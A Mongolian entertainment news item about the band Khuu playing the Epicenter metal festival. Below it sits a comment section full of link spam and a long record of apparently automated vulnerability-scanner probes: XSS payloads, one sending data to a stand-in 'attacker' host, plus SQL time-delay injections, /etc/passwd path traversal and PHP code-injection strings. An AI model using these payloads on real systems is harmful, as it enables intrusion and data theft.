“Epicenter” фестивальд “Хү” хамтлаг оролцоно

Ц.Анударь / Энтертайнмент

“Хү” хамтлаг энэ оны тавдугаар сарын 1-3-ны өдрүүдэд АНУ-ын Хойд Каролина мужид болох метал хөгжмийн алдартнуудыг нэгэн дээвэр дор авчрах “Epicenter” фестивальд оролцохоор болжээ.

Уг фестивалийн онцлох шигтгээ нь 1981 онд АНУ-ын Лос Анжелес хотноо байгуулагдсан хүнд метал хөгжмийн томоохон төлөөлөгч, домогт “Металлика” хамтлаг юм.

Гурван өдөр үргэлжлэх “Epicenter” фестивальд метал рок урсгалаар уран бүтээл туурвидаг 65 уран бүтээлч оролцох юм байна.

Тус фестивалийн энгийн тасалбар 179.50 ам.доллар, VIP тасалбар 499.50 ам.долларын үнэтэй аж.

Эх сурвалж: epicenterfestival.com


Сэтгэгдэл

ZAP [202.9.40.50] 2021-05-05 05:16:05

ZAP [202.9.40.50] 2021-05-05 05:16:04

lmfzrywsh [116.0.1.138] 2021-02-19 02:54:57

Мэдээ.МН <a href="http://www.g1b2e44g18eu03sg3c1q5yq47c11v2hos.org/">almfzrywsh</a> [url=http://www.g1b2e44g18eu03sg3c1q5yq47c11v2hos.org/]ulmfzrywsh[/url] lmfzrywsh http://www.g1b2e44g18eu03sg3c1q5yq47c11v2hos.org/

MARSHIL.L.ERDENEBAT [202.126.90.94] 2021-03-27 13:37:25

ENE.4.XYN.XYNI.CYNC.UDIRDAJ.JADDAG.

qexrslh [113.220.59.218] 2020-12-04 02:34:30

Мэдээ.МН qexrslh http://www.g5936i58230q224b87nlmnjx4dq7bliks.org/ <a href="http://www.g5936i58230q224b87nlmnjx4dq7bliks.org/">aqexrslh</a> [url=http://www.g5936i58230q224b87nlmnjx4dq7bliks.org/]uqexrslh[/url]

xqlwoenkc [218.24.172.158] 2020-11-29 14:54:13

Мэдээ.МН xqlwoenkc http://www.g8g645pz73224jyah55ye095l6w4yfwcs.org/ <a href="http://www.g8g645pz73224jyah55ye095l6w4yfwcs.org/">axqlwoenkc</a> [url=http://www.g8g645pz73224jyah55ye095l6w4yfwcs.org/]uxqlwoenkc[/url]

nhgmemyr [110.185.160.13] 2020-11-20 08:48:03

Мэдээ.МН nhgmemyr http://www.g1sv5wwq944wb2iba8g0lme35j225480s.org/ <a href="http://www.g1sv5wwq944wb2iba8g0lme35j225480s.org/">anhgmemyr</a> [url=http://www.g1sv5wwq944wb2iba8g0lme35j225480s.org/]unhgmemyr[/url]

gsqydcen [117.10.52.177] 2020-11-18 03:01:58

Мэдээ.МН [url=http://www.gis09u3105x5j46mma01c2ugwoo43w19s.org/]ugsqydcen[/url] <a href="http://www.gis09u3105x5j46mma01c2ugwoo43w19s.org/">agsqydcen</a> gsqydcen http://www.gis09u3105x5j46mma01c2ugwoo43w19s.org/

scoqkwpqbq [221.202.168.254] 2020-11-15 10:34:48

Мэдээ.МН <a href="http://www.gc6ku22703824abnk50x45xqhz45ym0ys.org/">ascoqkwpqbq</a> scoqkwpqbq http://www.gc6ku22703824abnk50x45xqhz45ym0ys.org/ [url=http://www.gc6ku22703824abnk50x45xqhz45ym0ys.org/]uscoqkwpqbq[/url]

e [116.113.93.82] 2020-10-28 22:02:34

1

e [116.113.93.82] 2020-10-28 22:02:30

1

e [116.113.93.82] 2020-10-28 22:02:26

1

e [116.113.93.82] 2020-10-28 22:02:23

1<mVsSen<

e [116.113.93.82] 2020-10-28 22:02:20

1<img sRc='http://attacker-9332/log.php?

e [116.113.93.82] 2020-10-28 22:02:15

1<TJ8kOx x=9347>

e [116.113.93.82] 2020-10-28 22:02:12

1<ifRAme sRc=9957.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:02:07

1<WPAM9T>PGR6O[!+!]</WPAM9T>

e [116.113.93.82] 2020-10-28 22:02:04

1Bsh4m <ScRiPt >TWaW(9473)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:02:01

1<% contenteditable onresize=TWaW(9343)>

e [116.113.93.82] 2020-10-28 22:01:58

1}body{acu:Expre/**/SSion(TWaW(9303))}

e [116.113.93.82] 2020-10-28 22:01:54

1<img<!-- --> src=x onerror=alert(9643);//><!-- -->

e [116.113.93.82] 2020-10-28 22:01:51

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:01:46

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:01:43

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:01:37

1<input autofocus onfocus=TWaW(9601)>

e [116.113.93.82] 2020-10-28 22:01:34

e [116.113.93.82] 2020-10-28 22:01:30

1<ScRiPt>TWaW(9258)</sCripT>

e [116.113.93.82] 2020-10-28 22:01:26

1\u003CScRiPt\TWaW(9475)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:01:23

%31%3C%53%63%52%69%50%74%20%3E%54%57%61%57%289593%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:01:19

1<img/src=">" onerror=alert(9085)>

e [116.113.93.82] 2020-10-28 22:01:14

1<img src=xyz OnErRor=TWaW(9647)>

e [116.113.93.82] 2020-10-28 22:01:11

1<img src=//testasp.vulnweb.com/t/dot.gif onload=TWaW(9689)>

e [116.113.93.82] 2020-10-28 22:01:07

1<body onload=TWaW(9158)>

e [116.113.93.82] 2020-10-28 22:01:04

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9800'>

e [116.113.93.82] 2020-10-28 22:01:01

1<isindex type=image src=1 onerror=TWaW(9112)>

e [116.113.93.82] 2020-10-28 22:00:58

1<svg

e [116.113.93.82] 2020-10-28 22:00:54

1<video><source onerror="javascript:TWaW(9991)">

e [116.113.93.82] 2020-10-28 22:00:51

1<ScRiPt >TWaW(9038)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:47

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9389></ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:44

1<ScRiPt >TWaW(9729)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:41

1<ScR<ScRiPt>IpT>TWaW(9494)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:00:37

1<script>TWaW(9329)</script>

e [116.113.93.82] 2020-10-28 22:00:34

1<W9JAG2>VHFHN[!+!]</W9JAG2>

e [116.113.93.82] 2020-10-28 22:00:31

1<ScRiPt >TWaW(9118)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:29

1

e [116.113.93.82] 2020-10-28 22:00:28

{{9999951*9999382}}

e [116.113.93.82] 2020-10-28 22:00:25

1<ggbIc9<

e [116.113.93.82] 2020-10-28 22:00:24

acux7380

e [116.113.93.82] 2020-10-28 22:00:22

1<img sRc='http://attacker-9061/log.php?

e [116.113.93.82] 2020-10-28 22:00:21

acu3924<s1﹥s2ʺs3ʹuca3924

e [116.113.93.82] 2020-10-28 22:00:19

1<qLEyQ5 x=9414>

e [116.113.93.82] 2020-10-28 22:00:17

19019728

e [116.113.93.82] 2020-10-28 22:00:15

1<ifRAme sRc=9820.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:00:14

'"()&%<acx><ScRiPt >TWaW(9823)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:13

1<WYJKQQ>RZTW6[!+!]</WYJKQQ>

e [116.113.93.82] 2020-10-28 22:00:11

1'"()&%<acx><ScRiPt >TWaW(9548)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:08

10qWZI <ScRiPt >3zut(9066)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:05

1<% contenteditable onresize=3zut(9450)>

e [116.113.93.82<kmEFYp<] 2020-10-28 22:00:04

1

e [116.113.93.82] 2020-10-28 22:00:02

1}body{acu:Expre/**/SSion(3zut(9657))}

e [116.113.93.82<img sRc='http://attacker-9618/log.php?] 2020-10-28 22:00:01

1

e [116.113.93.82] 2020-10-28 21:59:58

1<img<!-- --> src=x onerror=alert(9286);//><!-- -->

e [116.113.93.82<baAfZt x=9251>] 2020-10-28 21:59:58

1

e [116.113.93.82] 2020-10-28 21:59:55

[url=http://www.vulnweb.com][/url]

e [116.113.93.82<ifRAme sRc=9543.com></IfRamE>] 2020-10-28 21:59:55

1

e [116.113.93.82] 2020-10-28 21:59:52

<a HrEF=jaVaScRiPT:>

e [116.113.93.82<WKD7RX>OAVOS[!+!]</WKD7RX>] 2020-10-28 21:59:52

1

e [116.113.93.82] 2020-10-28 21:59:49

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82hxA0c <ScRiPt >TWaW(9431)</ScRiPt>] 2020-10-28 21:59:48

1

e [116.113.93.82] 2020-10-28 21:59:45

1<input autofocus onfocus=3zut(9316)>

e [116.113.93.82<% contenteditable onresize=TWaW(9756)>] 2020-10-28 21:59:44

1

e [116.113.93.82] 2020-10-28 21:59:43

e [116.113.93.82}body{acu:Expre/**/SSion(TWaW(9808))}] 2020-10-28 21:59:41

1

e [116.113.93.82] 2020-10-28 21:59:39

1<ScRiPt>3zut(9851)</sCripT>

e [116.113.93.82<img<!-- --> src=x onerror=alert(9143);//><!-- -->] 2020-10-28 21:59:38

1

e [116.113.93.82] 2020-10-28 21:59:35

1\u003CScRiPt\3zut(9895)\u003C/sCripT\u003E

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 21:59:34

1

e [116.113.93.82] 2020-10-28 21:59:32

%31%3C%53%63%52%69%50%74%20%3E%33%7A%75%74%289060%29%3C%2F%73%43%72%69%70%54%3E

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 21:59:31

1

e [116.113.93.82] 2020-10-28 21:59:29

1<img/src=">" onerror=alert(9037)>

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 21:59:28

1

e [116.113.93.82] 2020-10-28 21:59:25

1<img src=xyz OnErRor=3zut(9665)>

e [116.113.93.82<input autofocus onfocus=TWaW(9458)>] 2020-10-28 21:59:24

1

e [116.113.93.82] 2020-10-28 21:59:23

1<img src=//testasp.vulnweb.com/t/dot.gif onload=3zut(9512)>

e [] 2020-10-28 21:59:21

1

e [116.113.93.82] 2020-10-28 21:59:20

1

e [116.113.93.82] 2020-10-28 21:59:19

1<body onload=3zut(9967)>

e [116.113.93.82] 2020-10-28 21:59:19

1

e [116.113.93.82<ScRiPt>TWaW(9222)</sCripT>] 2020-10-28 21:59:18

1

e [116.113.93.82] 2020-10-28 21:59:18

1

e [116.113.93.82] 2020-10-28 21:59:16

1

e [116.113.93.82] 2020-10-28 21:59:15

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9916'>

e [116.113.93.82] 2020-10-28 21:59:15

1

e [116.113.93.82\u003CScRiPt\TWaW(9567)\u003C/sCripT\u003E] 2020-10-28 21:59:15

1

e [116.113.93.82] 2020-10-28 21:59:14

1

e [116.113.93.82] 2020-10-28 21:59:14

1

e [116.113.93.82] 2020-10-28 21:59:14

1

e [116.113.93.82] 2020-10-28 21:59:13

1

e [116.113.93.82] 2020-10-28 21:59:13

1<isindex type=image src=1 onerror=3zut(9475)>

e [116.113.93.82] 2020-10-28 21:59:12

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%54%57%61%57%289511%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 21:59:12

1

e [116.113.93.82] 2020-10-28 21:59:11

1

e [116.113.93.82] 2020-10-28 21:59:11

1

e [116.113.93.82] 2020-10-28 21:59:10

1

e [116.113.93.82] 2020-10-28 21:59:10

1

e [116.113.93.82] 2020-10-28 21:59:09

1

e [116.113.93.82] 2020-10-28 21:59:09

1<svg

e [116.113.93.82] 2020-10-28 21:59:09

1

e [116.113.93.82<img/src=">" onerror=alert(9879)>] 2020-10-28 21:59:09

1

e [116.113.93.82] 2020-10-28 21:59:08

1

e [116.113.93.82] 2020-10-28 21:59:08

1

e [116.113.93.82] 2020-10-28 21:59:07

1

e [116.113.93.82] 2020-10-28 21:59:06

1

e [116.113.93.82] 2020-10-28 21:59:06

1<video><source onerror="javascript:3zut(9129)">

e [116.113.93.82] 2020-10-28 21:59:06

1

e [116.113.93.82] 2020-10-28 21:59:05

1

e [116.113.93.82<img src=xyz OnErRor=TWaW(9820)>] 2020-10-28 21:59:05

1

e [116.113.93.82] 2020-10-28 21:59:05

1

e [116.113.93.82] 2020-10-28 21:59:05

1

e [116.113.93.82] 2020-10-28 21:59:04

1

e [116.113.93.82] 2020-10-28 21:59:04

1

e [116.113.93.82] 2020-10-28 21:59:03

1

e [116.113.93.82] 2020-10-28 21:59:03

1

e [116.113.93.82] 2020-10-28 21:59:03

1<ScRiPt >3zut(9207)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:02

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=TWaW(9311)>] 2020-10-28 21:59:02

1

e [116.113.93.82] 2020-10-28 21:59:02

1

e [116.113.93.82] 2020-10-28 21:59:01

1

e [116.113.93.82] 2020-10-28 21:59:01

1

e [116.113.93.82] 2020-10-28 21:59:00

1

e [116.113.93.82] 2020-10-28 21:59:00

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9317></ScRiPt>

e [116.113.93.82] 2020-10-28 21:58:59

1

e [116.113.93.82<body onload=TWaW(9278)>] 2020-10-28 21:58:59

1

e [116.113.93.82] 2020-10-28 21:58:59

1

e [116.113.93.82] 2020-10-28 21:58:58

1

e [116.113.93.82] 2020-10-28 21:58:57

1

e [116.113.93.82] 2020-10-28 21:58:57

1

e [116.113.93.82] 2020-10-28 21:58:56

1<ScRiPt >3zut(9704)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:58:55

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9595'>] 2020-10-28 21:58:55

1

e [116.113.93.82] 2020-10-28 21:58:54

1

e [116.113.93.82] 2020-10-28 21:58:54

1<ScR<ScRiPt>IpT>3zut(9650)</sCr<ScRiPt>IpT>

e [116.113.93.82<isindex type=image src=1 onerror=TWaW(9719)>] 2020-10-28 21:58:53

1

e [116.113.93.82] 2020-10-28 21:58:50

1<script>3zut(9159)</script>

e [116.113.93.82<svg ] 2020-10-28 21:58:49

1

e [116.113.93.82] 2020-10-28 21:58:47

1<WU9MBW>N6P1B[!+!]</WU9MBW>

e [116.113.93.82<video><source onerror="javascript:TWaW(9587)">] 2020-10-28 21:58:46

1

e [116.113.93.82] 2020-10-28 21:58:44

1<ScRiPt >3zut(9778)</ScRiPt>

e [116.113.93.82<ScRiPt >TWaW(9080)</ScRiPt>] 2020-10-28 21:58:43

1

e [116.113.93.82] 2020-10-28 21:58:41

{{10000169*9999604}}

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9996></ScRiPt>] 2020-10-28 21:58:39

1

e [116.113.93.82] 2020-10-28 21:58:37

acux2236

e [116.113.93.82<ScRiPt >TWaW(9917)</ScRiPt>] 2020-10-28 21:58:36

1

e [116.113.93.82] 2020-10-28 21:58:34

acu10843<s1﹥s2ʺs3ʹuca10843

e [116.113.93.82] 2020-10-28 21:58:33

1

e [116.113.93.82<ScR<ScRiPt>IpT>TWaW(9879)</sCr<ScRiPt>IpT>] 2020-10-28 21:58:33

1

e [116.113.93.82] 2020-10-28 21:58:32

1

e [116.113.93.82] 2020-10-28 21:58:32

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 21:58:31

1

e [116.113.93.82] 2020-10-28 21:58:31

19622526

e [116.113.93.82] 2020-10-28 21:58:31

1

e [116.113.93.82] 2020-10-28 21:58:30

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:58:30

1

e [116.113.93.82<script>TWaW(9975)</script>] 2020-10-28 21:58:30

1

e [116.113.93.82] 2020-10-28 21:58:30

1

e [116.113.93.82] 2020-10-28 21:58:29

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:58:29

Rzj7TAZP'));select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:58:28

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 21:58:28

1

e [116.113.93.82] 2020-10-28 21:58:27

'"()&%<acx><ScRiPt >3zut(9157)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:58:27

FPqPJKj8');select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:58:27

file:///etc/passwd

e [116.113.93.82] 2020-10-28 21:58:26

ZwTcGCdK';select pg_sleep(9); --

e [116.113.93.82<W0TCVK>VKQNO[!+!]</W0TCVK>] 2020-10-28 21:58:26

1

e [116.113.93.82] 2020-10-28 21:58:26

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 21:58:25

-1));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:58:25

..

e [116.113.93.82] 2020-10-28 21:58:24

-1);select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:58:24

1'"()&%<acx><ScRiPt >3zut(9266)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:58:24

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 21:58:24

-1;select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:58:23

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82<ScRiPt >TWaW(9318)</ScRiPt>] 2020-10-28 21:58:23

1

e [116.113.93.82] 2020-10-28 21:58:23

PbH0rXgO'; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 21:58:22

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 21:58:22

1 waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:58:21

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 21:58:21

-1); waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:58:20

/etc/passwd

e [{{9999454*9999440}}] 2020-10-28 21:58:20

1

e [116.113.93.82] 2020-10-28 21:58:19

-1; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:58:19

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 21:58:18

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82<C7mV2h<] 2020-10-28 21:58:18

1

e [116.113.93.82] 2020-10-28 21:58:17

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:58:17

e [116.113.93.82] 2020-10-28 21:58:17

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

e [116.113.93.82] 2020-10-28 21:58:16

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 21:58:16

e [acux2720] 2020-10-28 21:58:16

1

e [116.113.93.82] 2020-10-28 21:58:16

1

e [116.113.93.82] 2020-10-28 21:58:16

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

e [116.113.93.82] 2020-10-28 21:58:15

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:58:15

JyI=

e [116.113.93.82] 2020-10-28 21:58:15

1

e [116.113.93.82] 2020-10-28 21:58:15

if(now()=sysdate(),sleep(3),0)

e [116.113.93.82<img sRc='http://attacker-9967/log.php?] 2020-10-28 21:58:15

1

e [116.113.93.82] 2020-10-28 21:58:14

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 21:58:14

@@k0qb9

e [116.113.93.82] 2020-10-28 21:58:14

1

e [116.113.93.82] 2020-10-28 21:58:14

-1" OR 2+276-276-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:58:14

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 21:58:13

1

e [116.113.93.82] 2020-10-28 21:58:13

-1' OR 2+473-473-1=0+0+0+1 or 'ceFZSMEK'='

e [116.113.93.82] 2020-10-28 21:58:13

1

e [116.113.93.82] 2020-10-28 21:58:13

../../../../../../../../../../etc/passwd

e [acu5042<s1﹥s2ʺs3ʹuca5042] 2020-10-28 21:58:13

1

e [116.113.93.82] 2020-10-28 21:58:12

\

e [116.113.93.82] 2020-10-28 21:58:12

1

e [116.113.93.82<g3QTdM x=9312>] 2020-10-28 21:58:12

1

e [116.113.93.82] 2020-10-28 21:58:12

-1' OR 2+915-915-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:58:12

1

e [116.113.93.82] 2020-10-28 21:58:11

1'"

e [116.113.93.82] 2020-10-28 21:58:11

1

e [116.113.93.82] 2020-10-28 21:58:11

-1 OR 2+399-399-1=0+0+0+1

e [116.113.93.82] 2020-10-28 21:58:10

1

e [116.113.93.82] 2020-10-28 21:58:10

-1 OR 2+789-789-1=0+0+0+1 --

e [116.113.93.829153103] 2020-10-28 21:58:09

1

e [116.113.93.82] 2020-10-28 21:58:09

1

e [116.113.93.82<ifRAme sRc=9048.com></IfRamE>] 2020-10-28 21:58:09

1

e [116.113.93.82] 2020-10-28 21:58:08

Lq5Sro9W

e [116.113.93.82] 2020-10-28 21:58:08

1

e [116.113.93.82] 2020-10-28 21:58:07

1

e [116.113.93.82] 2020-10-28 21:58:07

<!--

e [116.113.93.82] 2020-10-28 21:58:06

'"

e [116.113.93.82] 2020-10-28 21:58:06

1

e ['"()&%<acx><ScRiPt >TWaW(9548)</ScRiPt>] 2020-10-28 21:58:06

1

e [116.113.93.82] 2020-10-28 21:58:05

${@print(md5(acunetix_wvs_security_test))}\

e [116.113.93.82<WKHKRW>HU6OV[!+!]</WKHKRW>] 2020-10-28 21:58:05

1

e [116.113.93.82] 2020-10-28 21:58:05

1

e [116.113.93.82] 2020-10-28 21:58:04

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 21:58:04

1

e [116.113.93.82] 2020-10-28 21:58:04

create/.

e [116.113.93.82] 2020-10-28 21:58:03

1

e [116.113.93.82] 2020-10-28 21:58:03

";print(md5(acunetix_wvs_security_test));$a="

e [<!--] 2020-10-28 21:58:03

1

e [116.113.93.82] 2020-10-28 21:58:03

create

e [116.113.93.82'"()&%<acx><ScRiPt >TWaW(9665)</ScRiPt>] 2020-10-28 21:58:03

1

e [] 2020-10-28 21:58:03

1

e [116.113.93.82] 2020-10-28 21:58:02

1

e [116.113.93.825DMXH <ScRiPt >3zut(9108)</ScRiPt>] 2020-10-28 21:58:02

1

e [116.113.93.82] 2020-10-28 21:58:02

1

e [116.113.93.82] 2020-10-28 21:58:02

';print(md5(acunetix_wvs_security_test));$a='

e ['"] 2020-10-28 21:58:02

1

e [116.113.93.82] 2020-10-28 21:58:02

1

e [116.113.93.82] 2020-10-28 21:58:02

create

e [] 2020-10-28 21:58:01

1

e [116.113.93.82] 2020-10-28 21:58:01

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 21:58:01

1

e [116.113.93.82] 2020-10-28 21:58:01

1

e [116.113.93.82] 2020-10-28 21:58:01

1

e [116.113.93.82] 2020-10-28 21:58:00

/www.vulnweb.com

e [JyI=] 2020-10-28 21:58:00

1

e [116.113.93.82] 2020-10-28 21:58:00

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [116.113.93.82<% contenteditable onresize=3zut(9223)>] 2020-10-28 21:57:59

1

e [@@4OSCw] 2020-10-28 21:57:58

1

e [/www.vulnweb.com] 2020-10-28 21:57:58

1

e [116.113.93.82] 2020-10-28 21:57:58

http://hitfd1D293i0l.bxss.me/

e [116.113.93.82] 2020-10-28 21:57:57

testasp.vulnweb.com/t/xss.html?%00

e [1] 2020-10-28 21:57:57

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 21:57:57

1

e [116.113.93.82] 2020-10-28 21:57:57

1

e [create/.] 2020-10-28 21:57:56

1

e [116.113.93.82] 2020-10-28 21:57:56

HttP://testasp.vulnweb.com/t/xss.html?%00

e [\] 2020-10-28 21:57:56

1

e [116.113.93.82] 2020-10-28 21:57:55

1

e [116.113.93.82}body{acu:Expre/**/SSion(3zut(9723))}] 2020-10-28 21:57:55

1

e [create] 2020-10-28 21:57:55

1

e [1'"] 2020-10-28 21:57:55

1

e [http://hitjCecdYXsrq.bxss.me/] 2020-10-28 21:57:55

1

e [116.113.93.82] 2020-10-28 21:57:55

1

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 21:57:54

1

e [create] 2020-10-28 21:57:54

1

e [116.113.93.82] 2020-10-28 21:57:54

1

e [116.113.93.82] 2020-10-28 21:57:54

testasp.vulnweb.com

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 21:57:54

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:57:54

1

e [116.113.93.82] 2020-10-28 21:57:54

1

e [116.113.93.82] 2020-10-28 21:57:54

1

e [116.113.93.82] 2020-10-28 21:57:53

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:57:53

1

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 21:57:53

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9728);//><!-- -->] 2020-10-28 21:57:53

1

e [116.113.93.82] 2020-10-28 21:57:53

1

e [116.113.93.82] 2020-10-28 21:57:52

Http://testasp.vulnweb.com/t/fit.txt

e [116.113.93.82] 2020-10-28 21:57:52

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 21:57:52

1

e [WEB-INF\web.xml] 2020-10-28 21:57:51

1

e [116.113.93.82] 2020-10-28 21:57:51

1some_inexistent_file_with_long_name.jpg

e [116.113.93.82] 2020-10-28 21:57:51

^(#$!@#$)(()))******

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 21:57:50

1

e [WEB-INF/web.xml] 2020-10-28 21:57:50

1

e [116.113.93.82] 2020-10-28 21:57:50

1

e [116.113.93.82] 2020-10-28 21:57:50

'"()

e [116.113.93.82] 2020-10-28 21:57:50

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [116.113.93.82] 2020-10-28 21:57:50

!(()&&!|*|*|

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 21:57:49

1

e [/WEB-INF/web.xml] 2020-10-28 21:57:49

1

e [116.113.93.82] 2020-10-28 21:57:49

Array

e [116.113.93.82] 2020-10-28 21:57:49

1

e [116.113.93.82] 2020-10-28 21:57:48

)

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 21:57:47

1

e [116.113.93.82] 2020-10-28 21:57:46

1

e [file:///etc/passwd] 2020-10-28 21:57:46

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 21:57:46

1

e ['"()] 2020-10-28 21:57:46

1

e [116.113.93.82] 2020-10-28 21:57:45

1&n904753=v936214

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 21:57:45

1

e [116.113.93.82] 2020-10-28 21:57:45

1

e [Array] 2020-10-28 21:57:45

1

e [..] 2020-10-28 21:57:44

1

e [116.113.93.82] 2020-10-28 21:57:44

Array

e [^(#$!@#$)(()))******] 2020-10-28 21:57:44

1

e [testasp.vulnweb.com] 2020-10-28 21:57:44

1

